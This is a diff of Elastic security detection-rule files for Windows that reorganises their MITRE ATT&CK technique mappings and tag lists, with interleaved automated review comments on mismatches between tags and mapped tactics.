@@ -83,36 +96,63 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" [[rule.threat.technique.subtechnique]] -id = "T1559.001" -name = "Component Object Model" -reference = "https://attack.mitre.org/techniques/T1559/001/" +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = 
"Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/initial_access_webshell_screenconnect_server.toml b/rules/windows/initial_access_webshell_screenconnect_server.toml index 1b5936dcd82..fbe76f594f5 100644 --- a/rules/windows/initial_access_webshell_screenconnect_server.toml +++ b/rules/windows/initial_access_webshell_screenconnect_server.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/12" [rule] author = ["Elastic"] @@ -92,12 +92,22 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
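Review bot: The new side drops T1021.003 (Distributed Component Object Model) and TA0008 Lateral Movement from a rule named for explorer.exe's parent arguments, and the tags hunk `@@ -60,7 +60,20 @@` removes `Tactic: Lateral Movement` to match; if the query still keys on the DCOM launch pattern (not visible in this hunk), that coverage is lost rather than relocated. The replacement mappings T1566.001/.002, T1059.* and T1218 are generic and say nothing about the DCOM-to-explorer relationship. Consider keeping the T1021.003 block alongside the new ones.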
@@ -108,20 +118,10 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/windows/initial_access_xsl_script_execution_via_com.toml b/rules/windows/initial_access_xsl_script_execution_via_com.toml index 9b08ea6268f..2a1b8903abd 100644 --- a/rules/windows/initial_access_xsl_script_execution_via_com.toml +++ b/rules/windows/initial_access_xsl_script_execution_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] author = ["Elastic"] @@ -18,7 +18,15 @@ name = "Remote XSL Script Execution via COM" risk_score = 21 rule_id = "48f657ee-de4f-477c-aa99-ed88ee7af97a" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' 
@@ -74,31 +82,31 @@ The Microsoft.XMLDOM COM interface allows applications to parse and transform XM [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" - -[[rule.threat.technique.subtechnique]] -id = "T1559.001" -name = "Component Object Model" -reference = "https://attack.mitre.org/techniques/T1559/001/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_alternate_creds_pth.toml b/rules/windows/lateral_movement_alternate_creds_pth.toml index 7ea89b9a9da..1e5bd39b62b 100644 --- a/rules/windows/lateral_movement_alternate_creds_pth.toml +++ b/rules/windows/lateral_movement_alternate_creds_pth.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/29" integration = ["windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
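Review bot: The T1559.001 (Component Object Model) / TA0002 Execution block is removed from a rule whose name, per the previous hunk's header, is `Remote XSL Script Execution via COM`; the "via COM" part of the detection now has no technique, and the tags hunk drops `Tactic: Execution` accordingly. The T1566.002 entry added above describes how the link arrives, not the COM-driven execution the rule detects. Retaining the T1559.001 block next to T1220 keeps the rule name and its mapping in agreement.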
@@ -55,7 +55,14 @@ references = ["https://attack.mitre.org/techniques/T1550/002/"] risk_score = 47 rule_id = "daafdf96-e7b1-4f14-b494-27e0d24b11f6" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Lateral Movement", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "new_terms" @@ -69,39 +76,22 @@ user.id : (S-1-5-21-* or S-1-12-1-*) and winlog.event_data.LogonProcessName : "s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" - [[rule.threat.technique.subtechnique]] id = "T1550.002" name = "Pass the Hash" reference = "https://attack.mitre.org/techniques/T1550/002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.002" -name = "Pass the Hash" -reference = "https://attack.mitre.org/techniques/T1550/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [rule.new_terms] field = "new_terms_fields" value = ["user.id"] diff --git a/rules/windows/lateral_movement_cmd_service.toml b/rules/windows/lateral_movement_cmd_service.toml index 580a36e40c5..3e17c1558a3 100644 --- a/rules/windows/lateral_movement_cmd_service.toml +++ b/rules/windows/lateral_movement_cmd_service.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -57,7 +57,15 @@ The Service Control Manager in Windows allows for the management of services, wh risk_score = 21 rule_id = "d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' 
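Review bot: The new `tags` list keeps only `Tactic: Lateral Movement`, but the threat hunk that follows (`@@ -72,49 +80,48 @@`) still declares three tactics on the new side — TA0008 Lateral Movement, TA0003 Persistence (context) and TA0002 Execution (re-added at the end) — so `Tactic: Execution` and `Tactic: Persistence` are now missing from the tags. Tags and threat tactics are expected to agree, and this is the kind of gap a tactic/tag consistency check would flag. Either add `"Tactic: Execution",` and `"Tactic: Persistence",` back into the list or drop the corresponding threat blocks.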
@@ -72,49 +80,48 @@ sequence by process.entity_id with maxspan = 1m [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml index 698eebfb106..ecce43b56cd 100644 --- a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml 
+++ b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/28" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/12" [rule] author = ["Elastic"] @@ -64,7 +64,20 @@ references = [ risk_score = 73 rule_id = "c6b40f4c-c6a9-434e-adb8-989b0d06d005" severity = "high" -tags = ["Domain: Endpoint", "Domain: Identity", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Credential Access", "Data Source: Active Directory", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "Domain: Identity", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Lateral Movement", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -86,11 +99,33 @@ sequence by source.port, source.ip with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.003" +name = "Pass the Ticket" +reference = "https://attack.mitre.org/techniques/T1550/003/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" +[[rule.threat.technique.subtechnique]] +id = "T1558.003" +name = "Kerberoasting" +reference = "https://attack.mitre.org/techniques/T1558/003/" + + [rule.threat.tactic] id = "TA0006" diff --git a/rules/windows/lateral_movement_dcom_hta.toml b/rules/windows/lateral_movement_dcom_hta.toml index 4df87d44b05..4f7be9dafd2 100644 --- a/rules/windows/lateral_movement_dcom_hta.toml +++ b/rules/windows/lateral_movement_dcom_hta.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
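Review bot: The added `[[rule.threat]]` blocks drop the single blank line that the removed lines show between `[[rule.threat]]`, `[[rule.threat.technique]]`, `[[rule.threat.technique.subtechnique]]` and `[rule.threat.tactic]`, and instead leave runs of two or three empty lines after the last `reference = ...`; TOML parses either way, but the new layout looks like a serializer artifact and should be normalized to the one-blank-line convention before merge (the same pattern recurs in every threat hunk of this patch). Separately, `T1558.003` Kerberoasting is now claimed next to `T1550.003` Pass the Ticket; whether a sequence keyed on `source.port, source.ip` with a 3s window actually observes service-ticket requests for service accounts is not visible here, so confirm the query covers that behaviour before carrying the sub-technique, otherwise keep the mapping at `T1558`.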
@@ -85,18 +85,36 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/lateral_movement_dcom_mmc20.toml b/rules/windows/lateral_movement_dcom_mmc20.toml index e90ad419cc3..edec6ac25c0 100644 --- a/rules/windows/lateral_movement_dcom_mmc20.toml +++ b/rules/windows/lateral_movement_dcom_mmc20.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
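Review bot: A second `[[rule.threat]]` entry with tactic `TA0005` Defense Evasion (`T1218.005` Mshta) is added, but no change to this file's `tags` appears in the patch, so unless the existing list already carries `"Tactic: Defense Evasion"` the tags and threat tactics now disagree and the tag-to-tactic consistency check will likely flag it. Add `"Tactic: Defense Evasion",` next to `"Tactic: Lateral Movement",` in the tags array if it is absent. The `tags` line itself is outside this hunk.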
@@ -84,36 +84,36 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml index b3becd3a64d..99d6bbb8067 100644 --- a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml +++ b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
@@ -60,7 +60,15 @@ references = ["https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round- risk_score = 47 rule_id = "8f919d4b-a5af-47ca-a594-6be59cd924a4" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -77,36 +85,19 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1559" -name = "Inter-Process Communication" -reference = "https://attack.mitre.org/techniques/T1559/" - -[[rule.threat.technique.subtechnique]] -id = "T1559.001" -name = "Component Object Model" -reference = "https://attack.mitre.org/techniques/T1559/001/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml index b5ac7330e7f..6ddfe3c7e4b 100644 --- a/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml 
+++ b/rules/windows/lateral_movement_defense_evasion_lanman_nullsessionpipe_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/22" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -91,26 +91,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml index ba70c4d0f18..c2c614f4ad2 100644 --- a/rules/windows/lateral_movement_executable_tool_transfer_smb.toml +++ b/rules/windows/lateral_movement_executable_tool_transfer_smb.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [rule] author = ["Elastic"] 
@@ -87,13 +87,24 @@ sequence by host.id with maxspan=30s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + [[rule.threat.technique]] id = "T1570" name = "Lateral Tool Transfer" reference = "https://attack.mitre.org/techniques/T1570/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml index e45c278391a..9f04832e1d8 100644 --- a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml +++ b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [transform] [[transform.osquery]] @@ -145,23 +145,19 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" -[[rule.threat.technique]] -id = "T1570" -name = "Lateral Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1570/" + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/lateral_movement_incoming_wmi.toml b/rules/windows/lateral_movement_incoming_wmi.toml index 9a228e246ec..8dbb6d82a42 100644 --- a/rules/windows/lateral_movement_incoming_wmi.toml 
+++ b/rules/windows/lateral_movement_incoming_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/20" [rule] author = ["Elastic"] @@ -57,7 +57,15 @@ Windows Management Instrumentation (WMI) is a core Windows feature enabling remo risk_score = 47 rule_id = "f3475224-b179-4f78-8877-c2bd64c26b88" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -91,31 +99,26 @@ sequence by host.id with maxspan = 20s [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" 
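Review bot: `"Tactic: Execution"` is removed from `tags`, while the threat hunk further down the same file keeps the `T1047` entry under `TA0002` Execution (those `[rule.threat.tactic]` lines are unchanged context), so the tags no longer list every tactic in the threat mapping and `Tactic: Execution` will likely be reported as missing. Either restore `"Tactic: Execution",` after `"Tactic: Lateral Movement",` or remove the Execution `[[rule.threat]]` entry, as the other rules in this patch do when they drop the tag. Removing the `T1021.003` DCOM sub-technique from a WMI rule looks right.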
diff --git a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml index 65c6a7dbcea..3352383ebb2 100644 --- a/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml +++ b/rules/windows/lateral_movement_mount_hidden_or_webdav_share_net.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/02" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -62,7 +62,21 @@ WebDav and hidden remote shares facilitate file sharing and collaboration across risk_score = 47 rule_id = "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
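Review bot: The tags gain `"Tactic: Initial Access"` but not `"Tactic: Discovery"`, while the threat hunk for this file adds a `TA0007` Discovery entry (`T1087.001` / `T1087.002`), so the tag list and tactic list disagree and `Tactic: Discovery` will likely be reported as missing. Add `"Tactic: Discovery",` after `"Tactic: Initial Access",` or drop the Discovery entry. A rule that triggers on `net`-style share mounts does not obviously demonstrate `T1078.003` Local Accounts or account enumeration either; confirm the query actually matches those behaviours before carrying the new mappings.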
@@ -80,18 +94,58 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" +[[rule.threat.technique.subtechnique]] +id = "T1087.001" +name = "Local Account" 